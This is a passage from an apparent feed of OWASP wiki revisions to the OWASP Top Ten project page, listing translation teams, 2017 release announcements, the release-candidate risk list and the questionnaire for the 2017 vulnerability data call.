manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235623</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235623"/>
				<updated>2017-11-19T22:36:17Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Preparing for 2017 release...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 Released==&lt;br /&gt;
The OWASP Top 10 - 2017 will be available for download on &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;20  November, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;. We are asking for comments to be submitted on the project's [https://github.com/OWASP/Top10/issues GitHub issues].&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Do we really need this - Neil Smithline - 19 November 2017 &lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_GM_(en).pdf | OWASP Top 10 2017 GM - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_RC2_Final.pdf | OWASP Top 10 2017 RC2 - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 RC2 Published&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 2 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
RC2 is available for download [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf from GitHub]. &lt;br /&gt;
&lt;br /&gt;
We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring. &lt;br /&gt;
&lt;br /&gt;
We strongly urge for any corrections or issues to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issue list].&lt;br /&gt;
&lt;br /&gt;
Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication.&lt;br /&gt;
&lt;br /&gt;
(We will be reaching out to translators shortly.)&lt;br /&gt;
&lt;br /&gt;
Andrew van der Stock&amp;lt;br/&amp;gt;&lt;br /&gt;
Brian Glas&amp;lt;br/&amp;gt;&lt;br /&gt;
Neil Smithline&amp;lt;br/&amp;gt;&lt;br /&gt;
Torsten Gigler&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information - for historical reference only==&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
